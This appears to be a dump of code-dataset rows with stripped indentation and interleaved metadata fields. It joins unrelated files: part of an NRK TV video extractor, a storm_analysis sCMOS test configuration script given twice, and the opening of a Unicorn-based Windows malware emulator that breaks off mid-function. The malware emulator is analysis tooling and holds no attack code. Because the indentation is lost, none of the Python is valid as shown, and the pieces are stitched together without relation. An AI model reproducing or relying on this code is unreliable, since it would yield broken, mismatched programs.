if not series:
series = title
if alt_title:
title += " - %s" % alt_title
if not season_number:
season_number = int_or_none(
self._search_regex(
r"Sesong\s+(\d+)",
description or "",
"season number",
default=None,
)
)
if not episode:
episode = alt_title if is_series else None
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"^(\d+)\.", episode or "", "episode number", default=None
)
)
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"\((\d+)\s*:\s*\d+\)",
description or "",
"episode number",
default=None,
)
)
info.update(
{
"title": title,
"series": series,
"season_id": season_id,
"season_number": season_number,
"episode": episode,
"episode_number": episode_number,
}
)
return info
class NRKTVIE(InfoExtractor):
IE_DESC = "NRK TV and NRK Radio"
_EPISODE_RE = r"(?P<id>[a-zA-Z]{4}\d{8})"
_VALID_URL = r"https?://(?:tv|radio)\.nrk(?:super)?\.no/(?:[^/]+/)*%s" % _EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/MDDP12000117",
"md5": "c4a5960f1b00b40d47db65c1064e0ab1",
"info_dict": {
"id": "MDDP12000117",
"ext": "mp4",
"title": "Alarm Trolltunga",
"description": "md5:46923a6e6510eefcce23d5ef2a58f2ce",
"duration": 2223.44,
"age_limit": 6,
"subtitles": {
"nb-nor": [
{
"ext": "vtt",
}
],
"nb-ttv": [
{
"ext": "vtt",
}
],
},
},
},
{
"url": "https://tv.nrk.no/serie/20-spoersmaal-tv/MUHH48000314/23-05-2014",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314",
"ext": "mp4",
"title": "20 spørsmål - 23. mai 2014",
"alt_title": "23. mai 2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23. mai 2014",
"age_limit": 0,
},
},
{
"url": "https://tv.nrk.no/program/mdfp15000514",
"info_dict": {
"id": "MDFP15000514",
"ext": "mp4",
"title": "Kunnskapskanalen - Grunnlovsjubiléet - Stor ståhei for ingenting",
"description": "md5:89290c5ccde1b3a24bb8050ab67fe1db",
"duration": 4605.08,
"series": "Kunnskapskanalen",
"episode": "Grunnlovsjubiléet - Stor ståhei for ingenting",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015#del=2",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "particular part is not supported currently",
},
{
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "Ikke tilgjengelig utenfor Norge",
},
{
"url": "https://tv.nrk.no/serie/anno/KMTE50001317/sesong-3/episode-13",
"info_dict": {
"id": "KMTE50001317",
"ext": "mp4",
"title": "Anno - 13. episode",
"description": "md5:11d9613661a8dbe6f9bef54e3a4cbbfa",
"duration": 2340,
"series": "Anno",
"episode": "13. episode",
"season_number": 3,
"episode_number": 13,
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/nytt-paa-nytt/MUHH46000317/27-01-2017",
"info_dict": {
"id": "MUHH46000317",
"ext": "mp4",
"title": "Nytt på Nytt 27.01.2017",
"description": "md5:5358d6388fba0ea6f0b6d11c48b9eb4b",
"duration": 1796,
"series": "Nytt på nytt",
"episode": "27.01.2017",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/NPUB21019315/12-07-2015#",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/lindmo/2018/MUHU11006318/avspiller",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201507/NPUB21019315",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKTVEpisodeIE(InfoExtractor):
_VALID_URL = r"https?://tv\.nrk\.no/serie/(?P<id>[^/]+/sesong/(?P<season_number>\d+)/episode/(?P<episode_number>\d+))"
_TESTS = [
{
"url": "https://tv.nrk.no/serie/hellums-kro/sesong/1/episode/2",
"info_dict": {
"id": "MUHH36005220",
"ext": "mp4",
"title": "Hellums kro - 2. Kro, krig og kjærlighet",
"description": "md5:ad92ddffc04cea8ce14b415deef81787",
"duration": 1563.92,
"series": "Hellums kro",
"season_number": 1,
"episode_number": 2,
"episode": "2. Kro, krig og kjærlighet",
"age_limit": 6,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1/episode/8",
"info_dict": {
"id": "MSUI14000816",
"ext": "mp4",
"title": "Backstage - 8. episode",
"description": "md5:de6ca5d5a2d56849e4021f2bf2850df4",
"duration": 1320,
"series": "Backstage",
"season_number": 1,
"episode_number": 8,
"episode": "8. episode",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
]
def _real_extract(self, url):
display_id, season_number, episode_number = re.match(
self._VALID_URL, url
).groups()
webpage = self._download_webpage(url, display_id)
info = self._search_json_ld(webpage, display_id, default={})
nrk_id = (
info.get("@id")
or self._html_search_meta("nrk:program-id", webpage, default=None)
or self._search_regex(
r'data-program-id=["\'](%s)' % NRKTVIE._EPISODE_RE, webpage, "nrk id"
)
)
assert re.match(NRKTVIE._EPISODE_RE, nrk_id)
info.update(
{
"_type": "url",
"id": nrk_id,
"url": "nrk:%s" % nrk_id,
"ie_key": NRKIE.ie_key(),
"season_number": int(season_number),
"episode_number": int(episode_number),
}
)
return info
class NRKTVSerieBaseIE(NRKBaseIE):
def _extract_entries(self, entry_list):
if not isinstance(entry_list, list):
return []
entries = []
for episode in entry_list:
nrk_id = episode.get("prfId") or episode.get("episodeId")
if not nrk_id or not isinstance(nrk_id, compat_str):
continue
entries.append(
self.url_result("nrk:%s" % nrk_id, ie=NRKIE.ie_key(), video_id=nrk_id)
)
return entries
_ASSETS_KEYS = (
"episodes",
"instalments",
)
def _extract_assets_key(self, embedded):
for asset_key in self._ASSETS_KEYS:
if embedded.get(asset_key):
return asset_key
@staticmethod
def _catalog_name(serie_kind):
return "podcast" if serie_kind in ("podcast", "podkast") else "series"
def _entries(self, data, display_id):
for page_num in itertools.count(1):
embedded = data.get("_embedded") or data
if not isinstance(embedded, dict):
break
assets_key = self._extract_assets_key(embedded)
if not assets_key:
break
# Extract entries
entries = try_get(
embedded,
(
lambda x: x[assets_key]["_embedded"][assets_key],
lambda x: x[assets_key],
),
list,
)
for e in self._extract_entries(entries):
yield e
# Find next URL
next_url_path = try_get(
data,
(
lambda x: x["_links"]["next"]["href"],
lambda x: x["_embedded"][assets_key]["_links"]["next"]["href"],
),
compat_str,
)
if not next_url_path:
break
data = self._call_api(
next_url_path,
display_id,
note="Downloading %s JSON page %d" % (assets_key, page_num),
fatal=False,
)
if not data:
break
class NRKTVSeasonIE(NRKTVSerieBaseIE):
_VALID_URL = r"""(?x)
https?://
(?P<domain>tv|radio)\.nrk\.no/
(?P<serie_kind>serie|pod[ck]ast)/
(?P<serie>[^/]+)/
(?:
(?:sesong/)?(?P<id>\d+)|
sesong/(?P<id_2>[^/?#&]+)
)
"""
_TESTS = [
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1",
"info_dict": {
"id": "backstage/1",
"title": "Sesong 1",
},
"playlist_mincount": 30,
},
{
# no /sesong/ in path
"url": "https://tv.nrk.no/serie/lindmo/2016",
"info_dict": {
"id": "lindmo/2016",
"title": "2016",
},
"playlist_mincount": 29,
},
{
# weird nested _embedded in catalog JSON response
"url": "https://radio.nrk.no/serie/dickie-dick-dickens/sesong/1",
"info_dict": {
"id": "dickie-dick-dickens/1",
"title": "Sesong 1",
},
"playlist_mincount": 11,
},
{
# 841 entries, multi page
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201509",
"info_dict": {
"id": "dagsnytt/201509",
"title": "September 2015",
},
"playlist_mincount": 841,
},
{
# 180 entries, single page
"url": "https://tv.nrk.no/serie/spangas/sesong/1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/diagnose-kverulant",
"info_dict": {
"id": "hele_historien/diagnose-kverulant",
"title": "Diagnose kverulant",
},
"playlist_mincount": 3,
},
{
"url": "https://radio.nrk.no/podkast/loerdagsraadet/sesong/202101",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if NRKTVIE.suitable(url)
or NRKTVEpisodeIE.suitable(url)
or NRKRadioPodkastIE.suitable(url)
else super(NRKTVSeasonIE, cls).suitable(url)
)
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
domain = mobj.group("domain")
serie_kind = mobj.group("serie_kind")
serie = mobj.group("serie")
season_id = mobj.group("id") or mobj.group("id_2")
display_id = "%s/%s" % (serie, season_id)
data = self._call_api(
"%s/catalog/%s/%s/seasons/%s"
% (domain, self._catalog_name(serie_kind), serie, season_id),
display_id,
"season",
query={"pageSize": 50},
)
title = try_get(data, lambda x: x["titles"]["title"], compat_str) or display_id
return self.playlist_result(self._entries(data, display_id), display_id, title)
class NRKTVSeriesIE(NRKTVSerieBaseIE):
_VALID_URL = r"https?://(?P<domain>(?:tv|radio)\.nrk|(?:tv\.)?nrksuper)\.no/(?P<serie_kind>serie|pod[ck]ast)/(?P<id>[^/]+)"
_TESTS = [
{
# new layout, instalments
"url": "https://tv.nrk.no/serie/groenn-glede",
"info_dict": {
"id": "groenn-glede",
"title": "Grønn glede",
"description": "md5:7576e92ae7f65da6993cf90ee29e4608",
},
"playlist_mincount": 90,
},
{
# new layout, instalments, more entries
"url": "https://tv.nrk.no/serie/lindmo",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/blank",
"info_dict": {
"id": "blank",
"title": "Blank",
"description": "md5:7664b4e7e77dc6810cd3bca367c25b6e",
},
"playlist_mincount": 30,
},
{
# new layout, seasons
"url": "https://tv.nrk.no/serie/backstage",
"info_dict": {
"id": "backstage",
"title": "Backstage",
"description": "md5:63692ceb96813d9a207e9910483d948b",
},
"playlist_mincount": 60,
},
{
# old layout
"url": "https://tv.nrksuper.no/serie/labyrint",
"info_dict": {
"id": "labyrint",
"title": "Labyrint",
"description": "I Daidalos sin undersjøiske Labyrint venter spennende oppgaver, skumle robotskapninger og slim.",
},
"playlist_mincount": 3,
},
{
"url": "https://tv.nrk.no/serie/broedrene-dal-og-spektralsteinene",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/saving-the-human-race",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/postmann-pat",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dickie-dick-dickens",
"info_dict": {
"id": "dickie-dick-dickens",
"title": "Dickie Dick Dickens",
"description": "md5:19e67411ffe57f7dce08a943d7a0b91f",
},
"playlist_mincount": 8,
},
{
"url": "https://nrksuper.no/serie/labyrint",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers",
"info_dict": {
"id": "ulrikkes_univers",
},
"playlist_mincount": 10,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/nrkno-poddkast-26588-134079-05042018030000",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if any(
ie.suitable(url)
for ie in (NRKTVIE, NRKTVEpisodeIE, NRKRadioPodkastIE, NRKTVSeasonIE)
)
else super(NRKTVSeriesIE, cls).suitable(url)
)
def _real_extract(self, url):
site, serie_kind, series_id = re.match(self._VALID_URL, url).groups()
is_radio = site == "radio.nrk"
domain = "radio" if is_radio else "tv"
size_prefix = "p" if is_radio else "embeddedInstalmentsP"
series = self._call_api(
"%s/catalog/%s/%s" % (domain, self._catalog_name(serie_kind), series_id),
series_id,
"serie",
query={size_prefix + "ageSize": 50},
)
titles = (
try_get(
series,
[
lambda x: x["titles"],
lambda x: x[x["type"]]["titles"],
lambda x: x[x["seriesType"]]["titles"],
],
)
or {}
)
entries = []
entries.extend(self._entries(series, series_id))
embedded = series.get("_embedded") or {}
linked_seasons = try_get(series, lambda x: x["_links"]["seasons"]) or []
embedded_seasons = embedded.get("seasons") or []
if len(linked_seasons) > len(embedded_seasons):
for season in linked_seasons:
season_url = urljoin(url, season.get("href"))
if not season_url:
season_name = season.get("name")
if season_name and isinstance(season_name, compat_str):
season_url = "https://%s.nrk.no/serie/%s/sesong/%s" % (
domain,
series_id,
season_name,
)
if season_url:
entries.append(
self.url_result(
season_url,
ie=NRKTVSeasonIE.ie_key(),
video_title=season.get("title"),
)
)
else:
for season in embedded_seasons:
entries.extend(self._entries(season, series_id))
entries.extend(self._entries(embedded.get("extraMaterial") or {}, series_id))
return self.playlist_result(
entries, series_id, titles.get("title"), titles.get("subtitle")
)
class NRKTVDirekteIE(NRKTVIE):
IE_DESC = "NRK TV Direkte and NRK Radio Direkte"
_VALID_URL = r"https?://(?:tv|radio)\.nrk\.no/direkte/(?P<id>[^/?#&]+)"
_TESTS = [
{
"url": "https://tv.nrk.no/direkte/nrk1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/direkte/p1_oslo_akershus",
"only_matching": True,
},
]
class NRKRadioPodkastIE(InfoExtractor):
_VALID_URL = r"https?://radio\.nrk\.no/pod[ck]ast/(?:[^/]+/)+(?P<id>l_[\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})"
_TESTS = [
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314AA",
"ext": "mp4",
"title": "20 spørsmål 23.05.2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23.05.2014",
},
},
{
"url": "https://radio.nrk.no/podcast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/sesong/1/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/bortfoert-i-bergen/l_774d1a2c-7aa7-4965-8d1a-2c7aa7d9652c",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKPlaylistBaseIE(InfoExtractor):
def _extract_description(self, webpage):
pass
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
entries = [
self.url_result("nrk:%s" % video_id, NRKIE.ie_key())
for video_id in re.findall(self._ITEM_RE, webpage)
]
playlist_title = self._extract_title(webpage)
playlist_description = self._extract_description(webpage)
return self.playlist_result(
entries, playlist_id, playlist_title, playlist_description
)
class NRKPlaylistIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://(?:www\.)?nrk\.no/(?!video|skole)(?:[^/]+/)+(?P<id>[^/]+)"
_ITEM_RE = r'class="[^"]*\brich\b[^"]*"[^>]+data-video-id="([^"]+)"'
_TESTS = [
{
"url": "http://www.nrk.no/troms/gjenopplev-den-historiske-solformorkelsen-1.12270763",
"info_dict": {
"id": "gjenopplev-den-historiske-solformorkelsen-1.12270763",
"title": "Gjenopplev den historiske solformørkelsen",
"description": "md5:c2df8ea3bac5654a26fc2834a542feed",
},
"playlist_count": 2,
},
{
"url": "http://www.nrk.no/kultur/bok/rivertonprisen-til-karin-fossum-1.12266449",
"info_dict": {
"id": "rivertonprisen-til-karin-fossum-1.12266449",
"title": "Rivertonprisen til Karin Fossum",
"description": "Første kvinne på 15 år til å vinne krimlitteraturprisen.",
},
"playlist_count": 2,
},
]
def _extract_title(self, webpage):
return self._og_search_title(webpage, fatal=False)
def _extract_description(self, webpage):
return self._og_search_description(webpage)
class NRKTVEpisodesIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://tv\.nrk\.no/program/[Ee]pisodes/[^/]+/(?P<id>\d+)"
_ITEM_RE = r'data-episode=["\']%s' % NRKTVIE._EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/episodes/nytt-paa-nytt/69031",
"info_dict": {
"id": "69031",
"title": "Nytt på nytt, sesong: 201210",
},
"playlist_count": 4,
}
]
def _extract_title(self, webpage):
return self._html_search_regex(
r"<h1>([^<]+)</h1>", webpage, "title", fatal=False
)
class NRKSkoleIE(InfoExtractor):
IE_DESC = "NRK Skole"
_VALID_URL = r"https?://(?:www\.)?nrk\.no/skole/?\?.*\bmediaId=(?P<id>\d+)"
_TESTS = [
{
"url": "https://www.nrk.no/skole/?page=search&q=&mediaId=14099",
"md5": "18c12c3d071953c3bf8d54ef6b2587b7",
"info_dict": {
"id": "6021",
"ext": "mp4",
"title": "Genetikk og eneggede tvillinger",
"description": "md5:3aca25dcf38ec30f0363428d2b265f8d",
"duration": 399,
},
},
{
"url": "https://www.nrk.no/skole/?page=objectives&subject=naturfag&objective=K15114&mediaId=19355",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
nrk_id = self._download_json(
"https://nrkno-skole-prod.kube.nrk.no/skole/api/media/%s" % video_id,
video_id,
)["psId"]
return self.url_result("nrk:%s" % nrk_id)
| true
| true
|
f70b3938b82bcdff4d037cfe9f07cbf0b506cfc7
| 4,413
|
py
|
Python
|
storm_analysis/diagnostics/sCMOS/configure.py
|
simone-codeluppi/storm-analysis
|
fa50fb7d670e9e4d712fa6fafb398963b39e209b
|
[
"CNRI-Python"
] | null | null | null |
storm_analysis/diagnostics/sCMOS/configure.py
|
simone-codeluppi/storm-analysis
|
fa50fb7d670e9e4d712fa6fafb398963b39e209b
|
[
"CNRI-Python"
] | null | null | null |
storm_analysis/diagnostics/sCMOS/configure.py
|
simone-codeluppi/storm-analysis
|
fa50fb7d670e9e4d712fa6fafb398963b39e209b
|
[
"CNRI-Python"
] | 1
|
2021-04-19T18:17:06.000Z
|
2021-04-19T18:17:06.000Z
|
#!/usr/bin/env python
"""
Configure folder for sCMOS testing.
Hazen 09/17
"""
import numpy
import os
import storm_analysis
import storm_analysis.sa_library.parameters as parameters
import storm_analysis.simulator.emitters_on_grid as emittersOnGrid
import storm_analysis.simulator.emitters_uniform_random as emittersUniformRandom
import storm_analysis.diagnostics.sCMOS.settings as settings
def testingParameters(cal_file):
"""
Create a sCMOS parameters object.
"""
params = parameters.ParametersSCMOS()
params.setAttr("max_frame", "int", -1)
params.setAttr("start_frame", "int", -1)
params.setAttr("background_sigma", "float", 8.0)
params.setAttr("camera_calibration", "filename", cal_file)
params.setAttr("find_max_radius", "int", 5)
params.setAttr("fit_error_model", "string", settings.fit_error_model)
params.setAttr("foreground_sigma", "float", 1.5)
params.setAttr("iterations", "int", settings.iterations)
params.setAttr("model", "string", settings.model)
params.setAttr("pixel_size", "float", settings.pixel_size)
params.setAttr("roi_size", "int", settings.roi_size)
params.setAttr("sigma", "float", 1.5)
params.setAttr("threshold", "float", settings.threshold)
# Don't do tracking.
params.setAttr("descriptor", "string", "1")
params.setAttr("radius", "float", "0.0")
# Don't do drift-correction.
params.setAttr("d_scale", "int", 2)
params.setAttr("drift_correction", "int", 0)
params.setAttr("frame_step", "int", 500)
params.setAttr("z_correction", "int", 0)
# Z fitting.
#
# These are nonsense values. We test either '2D' of '3D' mode
# and check how well we do at fitting the localization widths.
#
params.setAttr("do_zfit", "int", 0)
params.setAttr("cutoff", "float", 0.0)
params.setAttr("max_z", "float", 0.5)
params.setAttr("min_z", "float", -0.5)
params.setAttr("z_value", "float", 0.0)
params.setAttr("z_step", "float", 1.0)
params.setAttr("wx_wo", "float", 1.0)
params.setAttr("wx_c", "float", 1.0)
params.setAttr("wx_d", "float", 1.0)
params.setAttr("wxA", "float", 0.0)
params.setAttr("wxB", "float", 0.0)
params.setAttr("wxC", "float", 0.0)
params.setAttr("wxD", "float", 0.0)
params.setAttr("wy_wo", "float", 1.0)
params.setAttr("wy_c", "float", 1.0)
params.setAttr("wy_d", "float", 1.0)
params.setAttr("wyA", "float", 0.0)
params.setAttr("wyB", "float", 0.0)
params.setAttr("wyC", "float", 0.0)
params.setAttr("wyD", "float", 0.0)
# 'peak_locations' testing.
if hasattr(settings, "peak_locations") and (settings.peak_locations is not None):
params.setAttr("peak_locations", "filename", settings.peak_locations)
return params
def configure(cal_file = None):
# Create sCMOS calibration file if not specified.
#
if cal_file is None:
cal_file = "calib.npy"
offset = numpy.zeros((settings.y_size, settings.x_size)) + settings.camera_offset
variance = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_variance
gain = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_gain
rqe = numpy.ones((settings.y_size, settings.x_size))
numpy.save(cal_file, [offset, variance, gain, rqe, 2])
# Create parameters file for analysis.
#
print("Creating XML file.")
params = testingParameters(cal_file)
params.toXMLFile("scmos.xml", pretty = True)
# Create localization on a grid file.
#
print("Creating gridded localization.")
emittersOnGrid.emittersOnGrid("grid_list.hdf5",
settings.nx,
settings.ny,
1.5,
20,
0.0,
0.0)
# Create randomly located localizations file.
#
print("Creating random localization.")
emittersUniformRandom.emittersUniformRandom("random_list.hdf5",
1.0,
10,
settings.x_size,
settings.y_size,
0.0)
if (__name__ == "__main__"):
configure()
| 34.476563
| 92
| 0.603898
|
import numpy
import os
import storm_analysis
import storm_analysis.sa_library.parameters as parameters
import storm_analysis.simulator.emitters_on_grid as emittersOnGrid
import storm_analysis.simulator.emitters_uniform_random as emittersUniformRandom
import storm_analysis.diagnostics.sCMOS.settings as settings
def testingParameters(cal_file):
params = parameters.ParametersSCMOS()
params.setAttr("max_frame", "int", -1)
params.setAttr("start_frame", "int", -1)
params.setAttr("background_sigma", "float", 8.0)
params.setAttr("camera_calibration", "filename", cal_file)
params.setAttr("find_max_radius", "int", 5)
params.setAttr("fit_error_model", "string", settings.fit_error_model)
params.setAttr("foreground_sigma", "float", 1.5)
params.setAttr("iterations", "int", settings.iterations)
params.setAttr("model", "string", settings.model)
params.setAttr("pixel_size", "float", settings.pixel_size)
params.setAttr("roi_size", "int", settings.roi_size)
params.setAttr("sigma", "float", 1.5)
params.setAttr("threshold", "float", settings.threshold)
params.setAttr("descriptor", "string", "1")
params.setAttr("radius", "float", "0.0")
# Don't do drift-correction.
params.setAttr("d_scale", "int", 2)
params.setAttr("drift_correction", "int", 0)
params.setAttr("frame_step", "int", 500)
params.setAttr("z_correction", "int", 0)
params.setAttr("do_zfit", "int", 0)
params.setAttr("cutoff", "float", 0.0)
params.setAttr("max_z", "float", 0.5)
params.setAttr("min_z", "float", -0.5)
params.setAttr("z_value", "float", 0.0)
params.setAttr("z_step", "float", 1.0)
params.setAttr("wx_wo", "float", 1.0)
params.setAttr("wx_c", "float", 1.0)
params.setAttr("wx_d", "float", 1.0)
params.setAttr("wxA", "float", 0.0)
params.setAttr("wxB", "float", 0.0)
params.setAttr("wxC", "float", 0.0)
params.setAttr("wxD", "float", 0.0)
params.setAttr("wy_wo", "float", 1.0)
params.setAttr("wy_c", "float", 1.0)
params.setAttr("wy_d", "float", 1.0)
params.setAttr("wyA", "float", 0.0)
params.setAttr("wyB", "float", 0.0)
params.setAttr("wyC", "float", 0.0)
params.setAttr("wyD", "float", 0.0)
if hasattr(settings, "peak_locations") and (settings.peak_locations is not None):
params.setAttr("peak_locations", "filename", settings.peak_locations)
return params
def configure(cal_file = None):
if cal_file is None:
cal_file = "calib.npy"
offset = numpy.zeros((settings.y_size, settings.x_size)) + settings.camera_offset
variance = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_variance
gain = numpy.ones((settings.y_size, settings.x_size)) * settings.camera_gain
rqe = numpy.ones((settings.y_size, settings.x_size))
numpy.save(cal_file, [offset, variance, gain, rqe, 2])
print("Creating XML file.")
params = testingParameters(cal_file)
params.toXMLFile("scmos.xml", pretty = True)
print("Creating gridded localization.")
emittersOnGrid.emittersOnGrid("grid_list.hdf5",
settings.nx,
settings.ny,
1.5,
20,
0.0,
0.0)
print("Creating random localization.")
emittersUniformRandom.emittersUniformRandom("random_list.hdf5",
1.0,
10,
settings.x_size,
settings.y_size,
0.0)
if (__name__ == "__main__"):
configure()
| true
| true
|
f70b39f8922b10c9be5f4991136c6b870360b0d8
| 32,982
|
py
|
Python
|
emulator.py
|
GuillaumeOrlando/Windows_Malware_Emulator
|
6f49d424266d0126f359e4e4db66b690788f3b6a
|
[
"Apache-2.0"
] | 11
|
2021-03-16T18:41:29.000Z
|
2022-01-11T15:39:19.000Z
|
emulator.py
|
GuillaumeOrlando/Windows_Malware_Emulator
|
6f49d424266d0126f359e4e4db66b690788f3b6a
|
[
"Apache-2.0"
] | null | null | null |
emulator.py
|
GuillaumeOrlando/Windows_Malware_Emulator
|
6f49d424266d0126f359e4e4db66b690788f3b6a
|
[
"Apache-2.0"
] | null | null | null |
from unicorn import *
from unicorn.x86_const import *
from capstone import *
from importlib import import_module
from emulation.syscall import clean_stack
import argparse
import emulation.syscall as winsyscall
import pefile
import struct
import sys
import ast
import os
#TODO: Deal with SEH structure
#TODO: Randomize TEB base address
#TODO: Randomize process ID
#TODO: Randomize thread ID
#TODO: Process management
#TODO: Thread management
#TODO: Fake FileSystem
#TODO: Fake running process
API_refs = 'winapi_9k.csv'
regs = ['eax', 'ebx', 'ecx', 'edx', 'esp', 'ebp', 'edi', 'esi']
md = Cs(CS_ARCH_X86, CS_MODE_32)
full_content = ''
class Environment:
def __init__(self, args):
# Argument validation
self.breakpoint = args.breakpoint
self.trace = args.trace
self.dump = args.dump
self.silent = args.silent
self.out = args.out
self.stack = args.stack
self.registers = args.registers
self.debug = args.debug
self.handle_list = args.handle
self.show_extract = args.extract
self.imports = args.imports
self.dynamics = []
if self.trace:
self.calltrace = []
if self.stack and self.registers:
self.dump = True
if self.dump:
self.registers = True
self.stack = True
path = args.path
self.shortname = path.split('/')[-1].split('.')[0].lower()
self.drivename = 'C:\\Users\\EllenRipley\\Desktop\\' + self.shortname
self.username = 'EllenRipley'
self.computername = 'Nostromo'
self.computer_mac = '0F-0C-95-86-20-29'
self.computer_ip = '192.168.0.12'
self.path = path
self.chunks = []
self.virtual_memory = []
self.resources = {}
self.extracts = {}
self.threads = []
self.thread_ret = None
self.thread_trace = []
self.thread_max_replay = 5
self.max_loop = 10
self.current_loop_counter = 0
self.previous_loop = []
self.current_loop = []
self.execution_mode = 'default'
self.uc = Uc(UC_ARCH_X86, UC_MODE_32)
self.handle = {'0xaa': ['placeholder_dynamic_handle', 'dummy']}
try:
self.pe = pefile.PE(path)
except OSError as e:
print(e)
exit -1
except pefile.PEFormatError as e:
print(f'Malformated or invalid PE file: {e.value}')
exit -1
# Log every instruction emulated
def hook_code(self, a, address, size, user_data):
instruction = self.uc.mem_read(address, size)
# Manual Breakpoint
if self.breakpoint:
if hex(address) == self.breakpoint:
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
self.uc.emu_stop()
self.calltrace.append('breakpoint')
print('[+] Breakpoint hits at 0x%08x' % int(self.breakpoint, 16))
return
# Out of function range
for i in md.disasm(instruction, address):
#if 'int' in i.mnemonic:
#original_eip = self.uc.reg_read(UC_X86_REG_EIP)
#self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(i.bytes))
#return
if i.mnemonic == 'add' and i.op_str == 'byte ptr [eax], al':
print('[!] End of the main emulation thread')
self.uc.emu_stop()
return
# Bypass traps to debuger
#if str(i.mnemonic) == 'int3':
# if not self.silent:
# print('> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
# original_eip = self.uc.reg_read(UC_X86_REG_EIP)
# self.uc.reg_write(UC_X86_REG_EIP, original_eip + len(i.bytes))
if str(i.mnemonic) == 'call' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if target not in self.raw_IAT and self.silent:
# print('[CHECKME]> Tracing intruction ' + hex(i.address), ':', i.mnemonic, i.op_str)
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
else:
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'call':
#print('[Debug]', i.mnemonic, i.op_str)
self.hook_syscall(i.op_str, 'call', i.address, i.bytes)
elif str(i.mnemonic) == 'jmp' and 'dword ptr [' in i.op_str:
target = i.op_str.split('[')[1].split(']')[0]
if i.op_str in regs:
dest_addr = '0x%08x' % eval('self.uc.reg_read(UC_X86_REG_' + i.op_str.replace(' ','').upper() + ')')
elif ('+' in i.op_str or '-' in i.op_str or '*' in i.op_str):
left_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[0].replace(' ', '')
operator = i.op_str.split('[')[1].split(']')[0].split(' ')[1].replace(' ', '')
right_elem = i.op_str.split('[')[1].split(']')[0].split(' ')[2].replace(' ', '')
# call/jmp [eax+4]
if left_elem in regs:
left_value = hex(self.uc.reg_read(eval('UC_X86_REG_' + left_elem.upper())))
dest_addr_ptr = '0x%08x' % eval(left_value + operator + right_elem)
content = self.uc.mem_read(int(dest_addr_ptr, 16), 0x4)
target = '0x%08x' % struct.unpack('I', content)[0]
# call/jmp [eax*4 + 10]
elif '+' in left_elem or '-' in left_elem or '*' in left_elem:
